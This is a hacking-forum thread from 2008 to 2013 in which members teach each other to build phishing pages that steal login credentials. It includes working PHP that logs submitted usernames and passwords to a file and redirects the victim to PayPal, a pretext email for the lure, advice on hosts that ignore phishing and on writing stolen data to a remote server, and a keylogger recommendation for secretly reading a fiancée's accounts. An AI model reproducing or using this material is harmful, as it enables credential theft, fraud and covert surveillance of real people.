Page 1 of 2
Fake login pages. steal info
Posted: Mon May 26, 2008 2:01 am
by Sethioz
V kind a brought this up so i tought ill post .. well more like a question.
its about making the fake login pages for some site (like hotmail) and then give link to a 'victim'. once victim uses it to login then this page will send you his/her user+pass.
if somebody is intrested on how to make such fake login pages then post a reply here. right now the topic is private with quite detailed info (which im not planning to reveale), but i will post a general guide if there's ppl who is intrested in it.
note that..if you set it up RIGHT, then there is very high chance that victim will fall for it. 90% of world has no idea tht this stuff is even possible.
Re: Fake login pages. steal info
Posted: Mon May 26, 2008 10:27 am
by V
so... how does one have to make a fake page so it would be almost 90% successful? and should it fail at first, i doubt the "victim" hehe falls to it 2nd time. but then again that's very individual, depends on how stupid the person is. since 90% world is bunch of fools, including myself, that's why 10% rule rest of the 90% of the world.
Re: Fake login pages. steal info
Posted: Mon May 26, 2008 3:24 pm
by Sethioz
most likely once they will actually see this...they will use it to login. as i said .. need to make it look real and good.
Re: Fake login pages. steal info
Posted: Fri Jun 13, 2008 2:30 am
by Thor~God
plah i once falled for that fake login -_- it sux ass XD but i always figured how it worked
must be work of art or something... seth teach me when i get to est?
Re: Fake login pages. steal info
Posted: Fri Jun 13, 2008 2:46 pm
by Sethioz
work of art is when it actually logs you into real site too. so basically theres no way to tell if its fake or not .. only by the URL. ..but if u dont check it (99% of ppl never look at URL when they surf) then theres no way to tell.
Re: Fake login pages. steal info
Posted: Sat Aug 09, 2008 8:53 pm
by baalpeteor
sure i'm interested in seeing it. I used todo the old wmv + swf exploit for myspace... and have a fake login paged hosted on my nix box. The dynamic domain was like mysapce.servebbs.com (thanks to dyndns).
Got about 20 or so before i turned it off. Used to put the big fake clear block link over a whole myspace page or over view more pics (of gurls esp. dudes would have to login to see those pics. You can easily exploit guys using the power of their own penis heheh)
To login to the real site I would think you'd have to run a proxy on the pc that has the fake login page and shuffle their credentials to the real page.. and then whatever data is loaded it loads it to the client in a mitm attack.
Re: Fake login pages. steal info
Posted: Sat Aug 09, 2008 10:27 pm
by Sethioz
You can easily exploit guys using the power of their own penis heheh)
haha very well said.
i never actually tought about swf or wmv. how you inject anything in there ? or wht i am missing here?
and about links. if you send a spoofed mail from like [email protected] to somebody saying something like:
Code: Select all
Hello, we are converting data from one server to another and we need you to verify your account by simply logging in ... blablablablabla.... DO NOT send your login info to anyone...etc
it has to be really well written and polite. and link would be something like loginlive.somefreehosting.com/fdsa#"#"323dda/dsa32390¤¤%%%"2-dfsa32/account_login/23909dsa8¤%&%&
nobody even looks this ''somefreehosting'' there. it loox real, so at least 50% of ppl would actually use that link to login. you can also add something into mail like ... the new server will be faster..blabla. to get more ppl to click and use it. i cant remember where i uploaded it (prolly they deleted it by now), but i got mine working quite ok. when you used my fake page to login. it gave no errors, but it didnt log you in. it simply did click and emptyd the fields and then it was real site already. so second login was on real page, but then it already sent the info to me
Re: Fake login pages. steal info
Posted: Wed Jan 06, 2010 8:39 pm
by 54321
hey seth dude where would the login details be stored
what i want to know lets say this was my site right where would i(you) find my password
Re: Fake login pages. steal info
Posted: Thu Jan 07, 2010 7:41 pm
by Sethioz
it depends what kind of method you are using. you can store them anywhere. you can make the form send it to your email, store locally (where the site is hosted), upload to another FTP ...etc.
Re: Fake login pages. steal info
Posted: Thu Jan 07, 2010 11:29 pm
by 54321
To be truth fully honest its on the dot the same as this 1 PHB or sum thing but it gets confusing with the database and all i wanna know is where they are im using a free host and if u could say how i get it so it could be sent via email
the login and registration is the same as this 1
and also huge favor because my site is like this well not hackong site But the same format How did u manage to change the top left with a pic of your own and change the writing
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 12:34 am
by Sethioz
you don't need database.
here is an example. this code will save the info into a simple txt file, which will be located in same folder with the file.
Code: Select all
<?php
header ('Location: https://www.paypal.com/');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
and the following code will go into a fake page to make it use the code above.
Code: Select all
<div class="body"><form method="post" name="login_form" action="update.php">
ofcourse you can't just copy and paste, form name need to be called "login_form" and method need to be "post" ..etc
another option is to use formmail (google for it).
form mail is something that will email the details, but you still have to integrate it into a fake page.
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 11:37 am
by 54321
and where do i run the code
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 12:30 pm
by Sethioz
mah, its php, can't you see the <php ?> brackets ?
do you even understand what you are trying to do ? it is php code, which goes INSIDE of the fake page you make and then you upload your fake page and send somebody to that page.
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 3:45 pm
by 54321
ok are those 2 sep files or do they go together
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 3:55 pm
by Sethioz
uhm you can't make a fake page without any knownledge of php.
this one is for paypal. look at the fields. update.php is the file that will do the loggin and redirecting job for you. cant you see paypal.com in the code ?
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 5:56 pm
by 54321
ok i made fake page and bam site closed due to illegal activity is there a way around this
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 7:39 pm
by Sethioz
haha ofcourse they close it. try netsons.org. there are some "poor" hostings that will not check what you do.
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 9:26 pm
by 54321
haha thanks for telling me y not say.... hey man dont write this code unless u got unsecure site..... haha
Re: Fake login pages. steal info
Posted: Fri Jan 08, 2010 9:57 pm
by Sethioz
well i was testing it here on this site, but i never put it out in public, it was in password protected area, i dont need any problems on Looney friend :) otherwise i could host it.
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 11:19 am
by 54321
so where is the data stored even without program the password has to be stored somewhere
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 12:49 pm
by Sethioz
could you plz stop asking stupid things ?
as i said, you CAN NOT make a fake page without any knownledge of php/html. did you even took a look at the code ? NO you did not.
what im saying, is that before asking such things, you should go thru the code line by line.
there you will find this
Code: Select all
$handle = fopen("passwords.txt", "a");
this opens a file passwords.txt and writes the following values in it. you can directly modify page too and put formmail in it to make it send info to email/s. you really need knownledge of php. this is not something you can write tutorial for. if i would write tutorial for like paypal.com, then you would say omg its not working on hotmail, ofcourse it will not, because fields and values are not same.
basically you need only basic knownledge of "form". so you know what place to modify.
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 1:39 pm
by 54321
no man what im saying is there must be another place where it is stored
Wat i mean is with out changing anything where are the passwords
So say i make new account called (what) and password (12345) where does the site itself store the passwords because it has to remember your password to login or is it stored on the hosts side(whitch i dought)
and yes your code works but i dont want to be band from every hosting site
and yes i looked at the code if i had not i would not have been ban from the host
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 3:40 pm
by Sethioz
well you get banned for
hosting a fake page, even if it has no malicious code in it, it is illegal to copy a page and then host it. that goes for most of the sites, like yahoo, hotmail..etc.
so what you want, is to still have access to info ?
you want to host a fake page and still have access to stored/stolen login info after your hosting gets banned ?
if thats the case, try modifiying this
Code: Select all
$handle = fopen("passwords.txt", "a");
to this
Code: Select all
$handle = fopen("http://yoursite.com/fakepages/passwords.txt", "a");
however you need to set some permissions for the passwords.txt on your site then (other site).
your site will NOT get banned/cancelled if you have passwords there. i think you can use .htaccess file to allow remote writing into a local file.
for example if i would upload passwords.txt for you into this place:
sethioz.com/stuff/fakepages/passwords.txt
then you have no permissions to write into that file, i would have to give the permissions, but if its public, (CHMOD), then everybody would be able to write into it. so you need to find a way to block everything else, but that one hosting where you put the fake page to allow writing into passwords.txt. you can do all that using .htaccess file i think.
i just dont know .htaccess commands from head, i would google for them too, so do so.
OR if you have public IP (you are not behind router or NAT), then you can make it save directly into your pc, using same method, but again you have to give it a permissions.
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 6:21 pm
by 54321
ok i get that right.. but lets say i am u right.. then U on this not illegal site... want to get my password... on this site....
how would you do that ... bare in mind i had not copied anyones site at that stage.. but sure i put illegal code...
so do u get what im saying
SO basicly Right now i want you to get my password Through this site...
and then tell me how u did that
And try not telling the world wat my password is if u manage to find it
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 6:26 pm
by 54321
and this is a bit off topic Can you copy paste a spacific site say Gmail.... and get passwords from it... or do you have to create the user name and password BOX so it can be stored
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 8:40 pm
by Sethioz
that makes no sense. this code is not illegal. if you got banned from some hosting, it was something else.
only reason why they ban for this is when you copy a page and upload it, this is what this whole thread is about duh.
i already said this before that this example is for paypal. if you have no knownledge of php/html, then you can't do that.
it's like, you can't write, if you don't know how to read < it is simply impossible.
this very example i gave you is taken out of a paypal fake login (100% working).
Re: Fake login pages. steal info
Posted: Sat Jan 09, 2010 11:47 pm
by 54321
well 100% got banned with in about 10 seconds after i put code in
BUT still does not answer my question HOW WOULD U GET MY PASSWORD FROM THIS SITE..... YOUR OWN SITE... WHERE IN ftp or where ever would u find BOTH MY USER NAME AND PASSWORD
Re: Fake login pages. steal info
Posted: Sun Jan 10, 2010 2:17 am
by Sethioz
ah ok now i understand. you was confusing before.
well i could get it from database, just get the md5 hash and crack it, but md5 hash crack rate is about 89%, so most likely i would get your pass, unless its some long and hard one.
but i know what you asking. i would just inject a modified code into the index.php, into the <form /form> and make it save the passwords into a "blablabla.txt "file. i won't do that, because it would save ALL passwords (including mine) and it would be disaster if somebody would get that info.
yes i do hack and do evil things, but im not stealing my own site's users passwords or accounts. it would be too lame thing to do.
if you have basic knownledge of php/html, then it is extremely easy to write a code that will save login (POST data) into a file.
Re: Fake login pages. steal info
Posted: Sun Jan 10, 2010 2:19 pm
by 54321
ahhh thank you for that...so what would the code be.... and big quetion am i gonna be banned again for doing so
and seth how do i re enable php indexing
Re: Fake login pages. steal info
Posted: Sun Jan 10, 2010 5:51 pm
by Sethioz
try to understand that i cannot post you the full code or they would cancel/ban my hosting, which is really not mine. Looney is hosting it.
Code: Select all
<form method="post" name="login_form" action="update.php">
this goes into the page form. update.php will do the work, it will log you either into real page or redirect to real paypal.
AGAIN, you can not do this without basic knownledge of php/html.
Re: Fake login pages. steal info
Posted: Sun Jan 10, 2010 11:00 pm
by 54321
ok im saying this site now what would the modified code be And U hacking md5 do u do it with program or from expertise
Now bare in mind seth every1(well not evey2)but pretty much 80 to 90% of this forum have no idea what they doing... me... i have sum but compared to you we all look like a bunch of headless chickins that live for 80 years and never seem to die But im asking questions for the future so that you dont have to go through the whole process of this again....... and sure i barly know PHP..... but at 1 stage you never knew about php.... and no dought that at sum stage u asked for a little help...... and im not saying that you not helping those other bunch of wan!er forums Well are a bunch of Wan!ers I mean they give me a warning that (U cannot start your heading with capital letter)omg so i stright out called them all wan!ers
Got banned but who cares
Re: Fake login pages. steal info
Posted: Sun Jan 10, 2010 11:26 pm
by Sethioz
And U hacking md5 do u do it with program or from expertise
not hacking, cracking. only way to crack md5 hash is to collide it with the original string (password).
im using wordlists, bruteforce and rainbow tables.
plz no further discussion about md5 cracking here, its totally offtopic.
as about fake page, check PM on site (not forum pm, but on site).
Re: Fake login pages. steal info
Posted: Mon Jan 11, 2010 1:27 pm
by 54321
haha thanks seth... but still all i did was upload the files and again got banned any how im going to try the host that u sugested and see from there
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 10:16 am
by dimebag0818
Hey guys! How are you? I always go to your page so I decided to sign-up. I have this problem and I want to get some help from you guys...I'm getting married real soon and I think my fiance' is still communicating w/ her ex-boyfriend and it really pisses me off! I just want to make sure if she's really being naughty, I love this girl so much but if she's doing something behind my back I won't hesitate to cancel our wedding. I just wanna check her yahoo mail and her facebook...any help please? thanks in advance!
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 4:16 pm
by Sethioz
this is about fake pages, if you have question about fake login pages, then ask, don't talk about offtopic stuff here.
if you are stating that you want to get a fake page for yahoo or facebook, in order to send your "victim" there, then you can discuss it here.
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 4:47 pm
by dimebag0818
Sorry man, I don't know much about login pages...i just want to see her yahoo and facebook, where can I place my post or the right forum? sorry again...thanks!
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 5:00 pm
by Sethioz
well actually fake page is your best bet, so i guess this is right place. because there are no hacks for yahoo or facebook.
maybe somebody else here is willing to actually write you full page, im not up for this right now, sry.
its not hard tho, you just need basic of php.
you can try keylogger too, but its offtopic already. i suggest ardamax (very easy to use and make your own) read this to know how to make it undetectable >
Undetected keylogger - problems and solutions ?!
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 5:06 pm
by dimebag0818
Thank you so much dude! I'll try to figure it out...take care!
Re: Fake login pages. steal info
Posted: Sat Mar 27, 2010 5:37 pm
by Sethioz
basically as explained here, you need to first "save page as" and then modifiy the code lil bit to fit a keylogger in it, then you host it and send your victim on it.
the modifiying part is not easiest, but its not hard either. maybe somebody here is willing to make it.
so hey guys, if fake page aint problem for you, make one for yahoo and facebook and attach them.
Re: Fake login pages. steal info
Posted: Sat Feb 11, 2012 8:59 pm
by ronokae
I'm not extremely familiar with this type of thing however a contact of mine has a friend who coded something similar, he hacked peoples accounts on a game.
You could upload your own "mini-server", the program then strips a page of your choice and copies it (or atleast the Java Verification click).
It also uploads a bunch of links, for instance you would put in your own username/pw to enter the Mini server you created
then it you would upload your RAT/Keylogger and it ould give you a bunch of links like
http://www.Javawebcam.com/users/sethioz
http://www.Freepornbelle.net/Page/sethioz
http://Www.runescapepremium/users/sethioz
etc.
If someone was to go to your "site" it would ask them if they wanted to run the Legit-looking java plugin for the site, and the unsuspecting victim upon clicking "Run" would be infected, this is called a Java Driveby if I have my terminology correct, but the method they used is rather unique in that aspect.
ALSO,
I posted a program ealier, a website downloader, I think if you use that to copy a page you could modify it on your own actually, or save-page as.
Re: Fake login pages. steal info
Posted: Sat Feb 11, 2012 9:16 pm
by Sethioz
this would never work on me, zonaalarm fucks these kind of things real hard. only thing you can achieve with java "hacking" is stealing a cookie or session ..etc.
you can only get access to somebody's account, but not pc.
that website downloader is useless, it crashes every time after a while. i tried downloading few sites and crashed.
Re: Fake login pages. steal info
Posted: Sun Feb 12, 2012 1:39 am
by ronokae
The website downloader?
Which one did you use i posted one for the allies only and other was public
I downloaded a whole website 1000+ pages forum posts and all.
If not i still have a hold of the original (maybe the upload went wrong) I could provide you with it.
And I'm quite more than positive you can control the PC through the Java virus, Its not a virus written in Java but it uses the "applet" to enter the PC
Unless my understanding is extremely screwed i'm quite sure you could probably show you myself in a sandboxie, or let my mate show you given that he doesn't lend the program.
and besides his there are many like it.
Re: Fake login pages. steal info
Posted: Wed Mar 20, 2013 4:13 am
by Yonky
i have a prob wid my fake page which i created...
the problems is sending log file but empty widout username
nd pass of the victim............wat should i do help Me..!
Re: Fake login pages. steal info
Posted: Wed Mar 20, 2013 6:30 pm
by Sethioz
here, have some help !
... HOW exactly you expect me to help you? i don't understand. you don't give any details, no code, no examples .. and you scream HELP. lol
Re: Fake login pages. steal info
Posted: Wed Mar 20, 2013 7:56 pm
by Yonky
dude the fake page should send victims pass nd username to my hosting site
but it sends empty log file...! nw u understand..?
Re: Fake login pages. steal info
Posted: Wed Mar 20, 2013 8:36 pm
by KEN
Yonky wrote:dude the fake page should send victims pass nd username to my hosting site
but it sends empty log file...! nw u understand..?
What the hell is wrong with you? We don't have magic to tell us what is wrong with your fake page, we need details.
Suggestion in simple language: Tell us how did you make the fake page and where did you make changes in it using notepad(considering you used notepad to edit).
Re: Fake login pages. steal info
Posted: Thu Mar 21, 2013 12:20 pm
by Yonky
OKAY..................i made 2 pages... 1.)html 2.)php
so i made a fake html page of site nd edited wid notepad replaced action="site name"
an wid login.php im providing u images of both html n php...take a LOOk
let me knw if the codings r ryt or wrong..!
--->php
----->html
Re: Fake login pages. steal info
Posted: Thu Mar 21, 2013 1:59 pm
by KEN
Make sure that login file is saved as login.php.
In login.php replace
Code: Select all
foreach($_GET as $variable => $value) {
with
Code: Select all
foreach($_POST as $variable => $value) {
and try again
Re: Fake login pages. steal info
Posted: Thu Mar 21, 2013 7:19 pm
by Sethioz
why would you make screenshot of code??
i would have tested, but cant bother typing it out.
post code and use the "code" brackets to show it properly, then i can run a check.
Re: Fake login pages. steal info
Posted: Fri Mar 22, 2013 5:16 am
by Yonky
Thanxx KEN its workin,,,,,...............
very appreciated........! :)))